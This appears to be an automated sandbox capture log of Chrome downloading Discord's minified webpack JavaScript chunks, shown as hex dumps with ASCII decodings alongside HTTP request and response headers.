                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 2c 74 68 75 6d 62 48 61 73 68 54 6f 44 61 74 61 55 52 4c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 2c 72 28 22 37 30 31 30 32 22 29 2c 72 28 22 34 32 34 39 37 33 22 29 2c 72 28 22 32 32 32 30 30 37 22 29 2c 72 28 22 33 31 31 37 39 30 22 29 2c 72 28 22 34 37 37 36 35 37 22 29 2c 72 28 22 38 31 31 38 37 35 22 29 2c 72 28 22 39 30 33 30 31 22 29 2c 72 28 22 36 35 32 31 35 33 22 29 2c 72 28 22 32 38 37 39 37 22 29 2c 72 28 22 38 31 37 38 38 34 22 29 2c 72 28 22 35 39 37 33 34 39 22 29 2c 72 28 22 36 36 37 35 33 36 22 29 2c 72 28 22 36 39 30 33 34 31 22 29 2c 72 28 22 31 30 31 39 39 37 22 29 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 6c 65 74 20 6e 3d 74 5b 33 5d 2c 72 3d 31 32 38 26
                                                                          Data Ascii: tion(){return u},thumbHashToDataURL:function(){return a}}),r("70102"),r("424973"),r("222007"),r("311790"),r("477657"),r("811875"),r("90301"),r("652153"),r("28797"),r("817884"),r("597349"),r("667536"),r("690341"),r("101997");function e(t){let n=t[3],r=128&
                                                                          2023-12-10 16:45:10 UTC1019INData Raw: 26 74 5b 35 5d 29 2f 31 35 3a 31 2c 4f 3d 28 74 5b 35 5d 3e 3e 34 29 2f 31 35 2c 62 3d 4d 3f 36 3a 35 2c 64 3d 30 2c 77 3d 28 6e 2c 72 2c 65 29 3d 3e 7b 6c 65 74 20 75 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 61 3d 30 3b 61 3c 72 3b 61 2b 2b 29 66 6f 72 28 6c 65 74 20 6f 3d 61 3f 30 3a 31 3b 6f 2a 72 3c 6e 2a 28 72 2d 61 29 3b 6f 2b 2b 29 75 2e 70 75 73 68 28 28 28 74 5b 62 2b 28 64 3e 3e 31 29 5d 3e 3e 28 28 31 26 64 2b 2b 29 3c 3c 32 29 26 31 35 29 2f 37 2e 35 2d 31 29 2a 65 29 3b 72 65 74 75 72 6e 20 75 7d 2c 78 3d 77 28 70 2c 49 2c 28 69 3e 3e 31 38 26 33 31 29 2f 33 31 29 2c 43 3d 77 28 33 2c 33 2c 31 2e 32 35 2a 28 28 63 3e 3e 33 26 36 33 29 2f 36 33 29 29 2c 50 3d 77 28 33 2c 33 2c 31 2e 32 35 2a 28 28 63 3e 3e 39 26 36 33 29 2f 36 33 29 29 2c 42 3d 4d
                                                                          Data Ascii: &t[5])/15:1,O=(t[5]>>4)/15,b=M?6:5,d=0,w=(n,r,e)=>{let u=[];for(let a=0;a<r;a++)for(let o=a?0:1;o*r<n*(r-a);o++)u.push(((t[b+(d>>1)]>>((1&d++)<<2)&15)/7.5-1)*e);return u},x=w(p,I,(i>>18&31)/31),C=w(3,3,1.25*((c>>3&63)/63)),P=w(3,3,1.25*((c>>9&63)/63)),B=M


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          238192.168.2.549969162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC866OUTGET /assets/10991.d742d0d238c0d99e96ae.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ZSpCVMywQiiVfPT7vOGew6YWOI9N27ZE4E8DXhnYM1s-1702226709260-0-604800000
                                                                          2023-12-10 16:45:10 UTC1120INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 35 33 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 39 35 63 65 31 34 63 31 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 10530Connection: closeCF-Ray: 8336f4e95ce14c14-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:10 UTC249INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 30 39 39 31 22 5d 2c 7b 33 33 39 31 38 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 34 37 37 31 35 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 29 7b 74 2e 63 6c 61 73 73 4c 69 73 74 3f 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 65 29 3a 21 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 74 2c 65 29 26 26 28
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["10991"],{339186:function(t,e,n){"use strict";n.r(e),n.d(e,{default:function(){return r}});var i=n("477150");function r(t,e){t.classList?t.classList.add(e):!(0,i.default)(t,e)&&(
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 2e 63 6c 61 73 73 4e 61 6d 65 3f 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 74 2e 63 6c 61 73 73 4e 61 6d 65 2b 22 20 22 2b 65 3a 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 22 2c 28 74 2e 63 6c 61 73 73 4e 61 6d 65 26 26 74 2e 63 6c 61 73 73 4e 61 6d 65 2e 62 61 73 65 56 61 6c 7c 7c 22 22 29 2b 22 20 22 2b 65 29 29 7d 7d 2c 34 37 37 31 35 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6c 61 73 73 4c 69 73 74 3f 21 21 65 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 65 29 3a 2d 31 21 3d 3d 28 22 20 22 2b 28 74 2e 63 6c 61 73 73 4e 61 6d 65 2e 62
                                                                          Data Ascii: "string"==typeof t.className?t.className=t.className+" "+e:t.setAttribute("class",(t.className&&t.className.baseVal||"")+" "+e))}},477150:function(t,e,n){"use strict";function i(t,e){return t.classList?!!e&&t.classList.contains(e):-1!==(" "+(t.className.b
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 6f 6e 28 74 2c 6e 29 7b 65 2e 61 64 64 43 6c 61 73 73 28 74 2c 6e 3f 22 61 70 70 65 61 72 22 3a 22 65 6e 74 65 72 22 2c 22 61 63 74 69 76 65 22 29 2c 65 2e 70 72 6f 70 73 2e 6f 6e 45 6e 74 65 72 69 6e 67 26 26 65 2e 70 72 6f 70 73 2e 6f 6e 45 6e 74 65 72 69 6e 67 28 74 2c 6e 29 7d 2c 65 2e 6f 6e 45 6e 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 69 3d 6e 3f 22 61 70 70 65 61 72 22 3a 22 65 6e 74 65 72 22 3b 65 2e 72 65 6d 6f 76 65 43 6c 61 73 73 65 73 28 74 2c 69 29 2c 65 2e 61 64 64 43 6c 61 73 73 28 74 2c 69 2c 22 64 6f 6e 65 22 29 2c 65 2e 70 72 6f 70 73 2e 6f 6e 45 6e 74 65 72 65 64 26 26 65 2e 70 72 6f 70 73 2e 6f 6e 45 6e 74 65 72 65 64 28 74 2c 6e 29 7d 2c 65 2e 6f 6e 45 78 69 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65
                                                                          Data Ascii: on(t,n){e.addClass(t,n?"appear":"enter","active"),e.props.onEntering&&e.props.onEntering(t,n)},e.onEntered=function(t,n){var i=n?"appear":"enter";e.removeClasses(t,i),e.addClass(t,i,"done"),e.props.onEntered&&e.props.onEntered(t,n)},e.onExit=function(t){e
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 2e 64 65 66 61 75 6c 74 2c 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 7b 7d 2c 65 2c 7b 6f 6e 45 6e 74 65 72 3a 74 68 69 73 2e 6f 6e 45 6e 74 65 72 2c 6f 6e 45 6e 74 65 72 65 64 3a 74 68 69 73 2e 6f 6e 45 6e 74 65 72 65 64 2c 6f 6e 45 6e 74 65 72 69 6e 67 3a 74 68 69 73 2e 6f 6e 45 6e 74 65 72 69 6e 67 2c 6f 6e 45 78 69 74 3a 74 68 69 73 2e 6f 6e 45 78 69 74 2c 6f 6e 45 78 69 74 69 6e 67 3a 74 68 69 73 2e 6f 6e 45 78 69 74 69 6e 67 2c 6f 6e 45 78 69 74 65 64 3a 74 68 69 73 2e 6f 6e 45 78 69 74 65 64 7d 29 29 7d 2c 65 7d 28 6c 2e 43 6f 6d 70 6f 6e 65 6e 74 29 3b 70 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3d 7b 63 6c 61 73 73 4e 61 6d 65 73 3a 22 22 7d 2c 70 2e 70 72 6f 70 54 79 70 65 73 3d 7b 7d 3b 76 61 72 20 66 3d
                                                                          Data Ascii: reateElement(c.default,(0,i.default)({},e,{onEnter:this.onEnter,onEntered:this.onEntered,onEntering:this.onEntering,onExit:this.onExit,onExiting:this.onExiting,onExited:this.onExited}))},e}(l.Component);p.defaultProps={classNames:""},p.propTypes={};var f=
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 6e 2e 75 70 64 61 74 65 53 74 61 74 75 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 21 31 29 2c 6e 75 6c 6c 21 3d 3d 65 29 7b 74 68 69 73 2e 63 61 6e 63 65 6c 4e 65 78 74 43 61 6c 6c 62 61 63 6b 28 29 3b 76 61 72 20 6e 3d 75 2e 66 69 6e 64 44 4f 4d 4e 6f 64 65 28 74 68 69 73 29 3b 65 3d 3d 3d 66 3f 74 68 69 73 2e 70 65 72 66 6f 72 6d 45 6e 74 65 72 28 6e 2c 74 29 3a 74 68 69 73 2e 70 65 72 66 6f 72 6d 45 78 69 74 28 6e 29 7d 65 6c 73 65 20 74 68 69 73 2e 70 72 6f 70 73 2e 75 6e 6d 6f 75 6e 74 4f 6e 45 78 69 74 26 26 74 68 69 73 2e 73 74 61 74 65 2e 73 74 61 74 75 73 3d 3d 3d 70 26 26 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 73 74 61 74 75 73 3a 64 7d 29 7d 2c 6e 2e 70 65 72 66 6f 72 6d 45 6e 74
                                                                          Data Ascii: n.updateStatus=function(t,e){if(void 0===t&&(t=!1),null!==e){this.cancelNextCallback();var n=u.findDOMNode(this);e===f?this.performEnter(n,t):this.performExit(n)}else this.props.unmountOnExit&&this.state.status===p&&this.setState({status:d})},n.performEnt
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 29 7b 6e 3d 21 31 7d 2c 74 68 69 73 2e 6e 65 78 74 43 61 6c 6c 62 61 63 6b 7d 2c 6e 2e 6f 6e 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 74 68 69 73 2e 73 65 74 4e 65 78 74 43 61 6c 6c 62 61 63 6b 28 6e 29 3b 76 61 72 20 69 3d 6e 75 6c 6c 3d 3d 65 26 26 21 74 68 69 73 2e 70 72 6f 70 73 2e 61 64 64 45 6e 64 4c 69 73 74 65 6e 65 72 3b 69 66 28 21 74 7c 7c 69 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 6e 65 78 74 43 61 6c 6c 62 61 63 6b 2c 30 29 3b 72 65 74 75 72 6e 7d 74 68 69 73 2e 70 72 6f 70 73 2e 61 64 64 45 6e 64 4c 69 73 74 65 6e 65 72 26 26 74 68 69 73 2e 70 72 6f 70 73 2e 61 64 64 45 6e 64 4c 69 73 74 65 6e 65 72 28 74 2c 74 68 69 73 2e 6e 65 78 74 43 61 6c 6c 62 61 63 6b 29 2c 6e 75 6c 6c 21
                                                                          Data Ascii: ){n=!1},this.nextCallback},n.onTransitionEnd=function(t,e,n){this.setNextCallback(n);var i=null==e&&!this.props.addEndListener;if(!t||i){setTimeout(this.nextCallback,0);return}this.props.addEndListener&&this.props.addEndListener(t,this.nextCallback),null!
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 65 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 5b 65 5d 7d 29 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 6e 29 7b 76 61 72 20 69 2c 72 3d 28 69 3d 74 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 6e 29 7c 7c 74 68 69 73 29 2e 68 61 6e 64 6c 65 45 78 69 74 65 64 2e 62 69 6e 64 28 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 69 29 29 29 3b 72 65 74 75 72 6e 20 69 2e 73 74 61 74 65 3d 7b 63 6f 6e 74 65 78 74 56 61 6c 75 65 3a 7b 69 73 4d 6f 75 6e 74 69 6e 67 3a 21 30 7d 2c 68 61 6e 64 6c 65 45 78 69 74 65 64 3a 72 2c 66 69 72 73 74 52 65 6e 64 65
                                                                          Data Ascii: es||function(t){return Object.keys(t).map(function(e){return t[e]})},p=function(t){function e(e,n){var i,r=(i=t.call(this,e,n)||this).handleExited.bind((0,s.default)((0,s.default)(i)));return i.state={contextValue:{isMounting:!0},handleExited:r,firstRende
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 38 38 34 36 39 31 22 29 2c 72 3d 6e 2e 6e 28 69 29 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 7d 2c 39 31 39 39 30 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 69 3d 7b 64 69 73 61 62 6c 65 64 3a 21 31 7d 7d 2c 33 32 34 31 33 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c
                                                                          Data Ascii: ,n){"use strict";n.r(e),n.d(e,{default:function(){return r}});var i=n("884691"),r=n.n(i).createContext(null)},919901:function(t,e,n){"use strict";n.r(e),n.d(e,{default:function(){return i}});var i={disabled:!1}},324134:function(t,e,n){"use strict";n.r(e),
                                                                          2023-12-10 16:45:10 UTC698INData Raw: 74 69 6f 6e 28 72 29 7b 76 61 72 20 75 3d 6f 5b 72 5d 3b 69 66 28 28 30 2c 69 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 29 28 75 29 29 7b 76 61 72 20 6c 3d 72 20 69 6e 20 65 2c 63 3d 72 20 69 6e 20 73 2c 64 3d 65 5b 72 5d 2c 70 3d 28 30 2c 69 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 29 28 64 29 26 26 21 64 2e 70 72 6f 70 73 2e 69 6e 3b 63 26 26 28 21 6c 7c 7c 70 29 3f 6f 5b 72 5d 3d 28 30 2c 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 29 28 75 2c 7b 6f 6e 45 78 69 74 65 64 3a 6e 2e 62 69 6e 64 28 6e 75 6c 6c 2c 75 29 2c 69 6e 3a 21 30 2c 65 78 69 74 3a 61 28 75 2c 22 65 78 69 74 22 2c 74 29 2c 65 6e 74 65 72 3a 61 28 75 2c 22 65 6e 74 65 72 22 2c 74 29 7d 29 3a 63 7c 7c 21 6c 7c 7c 70 3f 63 26 26 6c 26 26 28 30 2c 69 2e 69 73 56 61 6c 69 64 45 6c 65
                                                                          Data Ascii: tion(r){var u=o[r];if((0,i.isValidElement)(u)){var l=r in e,c=r in s,d=e[r],p=(0,i.isValidElement)(d)&&!d.props.in;c&&(!l||p)?o[r]=(0,i.cloneElement)(u,{onExited:n.bind(null,u),in:!0,exit:a(u,"exit",t),enter:a(u,"enter",t)}):c||!l||p?c&&l&&(0,i.isValidEle


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          239192.168.2.549973162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC866OUTGET /assets/20117.7c4ea5cd4685b0442b9f.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=6rPx99.138aSgsi.Saw4lDXW2Yvp_ZooijdsDQ1L9wo-1702226709386-0-604800000
                                                                          2023-12-10 16:45:10 UTC965INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 35 38 30 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 39 35 63 66 66 37 34 37 62 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 55805Connection: closeCF-Ray: 8336f4e95cff747b-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:10 UTC404INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 30 31 31 37 22 5d 2c 7b 35 38 33 31 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 65 29 2c 72 2e 64 28 65 2c 7b 43 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 61 63 68 65 7d 7d 29 2c 72 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 6e 3d 72 28 22 39 32 36 32 31 38 22 29 2c 69 3d 72 28 22 37 33 37 39 31 32 22 29 2c 61 3d 72 28 22 38 37 31 31 31 31 22 29 2c 43 61 63 68 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 43 61 63 68 65 28 29 7b
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20117"],{58319:function(t,e,r){"use strict";r.r(e),r.d(e,{Cache:function(){return Cache}}),r("424973");var n=r("926218"),i=r("737912"),a=r("871111"),Cache=function(){function Cache(){
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 2e 63 6c 6f 6e 65 44 61 74 65 73 29 28 65 29 29 2c 22 61 6c 6c 22 3d 3d 3d 74 3f 74 68 69 73 2e 61 6c 6c 3d 65 3a 28 72 2e 5f 76 61 6c 75 65 3d 65 2c 74 68 69 73 5b 74 5d 2e 70 75 73 68 28 72 29 29 7d 2c 43 61 63 68 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 63 61 63 68 65 47 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 21 31 2c 6f 3d 65 3f 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3a 5b 5d 2c 73 3d 74 68 69 73 5b 74 5d 3b 69 66 28 22 61 6c 6c 22 3d 3d 3d 74 29 72 3d 74 68 69 73 2e 61 6c 6c 3b 65 6c 73 65 20 69 66 28 28 30 2c 61 2e 69 73 41 72 72 61 79 29 28 73 29 29 66 6f 72 28 76 61 72 20 75 3d 30 3b 75 3c 73 2e 6c 65 6e 67 74 68 3b 75 2b 2b 29 7b 76 61 72 20 64 3d 73 5b 75 5d 3b 69 66 28 21 28 6f 2e 6c 65 6e 67 74 68 26 26 66 75 6e
                                                                          Data Ascii: .cloneDates)(e)),"all"===t?this.all=e:(r._value=e,this[t].push(r))},Cache.prototype._cacheGet=function(t,e){var r=!1,o=e?Object.keys(e):[],s=this[t];if("all"===t)r=this.all;else if((0,a.isArray)(s))for(var u=0;u<s.length;u++){var d=s[u];if(!(o.length&&fun
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 65 3d 65 2c 74 68 69 73 2e 73 65 63 6f 6e 64 3d 72 2c 74 68 69 73 2e 6d 69 6c 6c 69 73 65 63 6f 6e 64 3d 6e 7c 7c 30 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 48 6f 75 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 68 6f 75 72 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 4d 69 6e 75 74 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 69 6e 75 74 65 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 53 65 63 6f 6e 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 65 63 6f 6e 64 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73
                                                                          Data Ascii: e=e,this.second=r,this.millisecond=n||0}return t.prototype.getHours=function(){return this.hour},t.prototype.getMinutes=function(){return this.minute},t.prototype.getSeconds=function(){return this.second},t.prototype.getMilliseconds=function(){return this
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 2d 28 74 68 69 73 2e 67 65 74 57 65 65 6b 64 61 79 28 29 2b 31 2b 28 36 2d 65 29 29 2b 37 2a 74 3a 74 68 69 73 2e 64 61 79 2b 3d 2d 28 74 68 69 73 2e 67 65 74 57 65 65 6b 64 61 79 28 29 2d 65 29 2b 37 2a 74 2c 74 68 69 73 2e 66 69 78 44 61 79 28 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 44 61 69 6c 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 64 61 79 2b 3d 74 2c 74 68 69 73 2e 66 69 78 44 61 79 28 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 48 6f 75 72 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 65 26 26 28 74 68 69 73 2e 68 6f 75 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 32 33 2d 74 68 69 73 2e 68 6f 75 72 29 2f 74 29 2a 74 29 3b 3b 29 7b 74 68 69 73 2e 68 6f 75 72 2b 3d 74 3b 76 61 72 20 6e 3d
                                                                          Data Ascii: -(this.getWeekday()+1+(6-e))+7*t:this.day+=-(this.getWeekday()-e)+7*t,this.fixDay()},e.prototype.addDaily=function(t){this.day+=t,this.fixDay()},e.prototype.addHours=function(t,e,r){for(e&&(this.hour+=Math.floor((23-this.hour)/t)*t);;){this.hour+=t;var n=
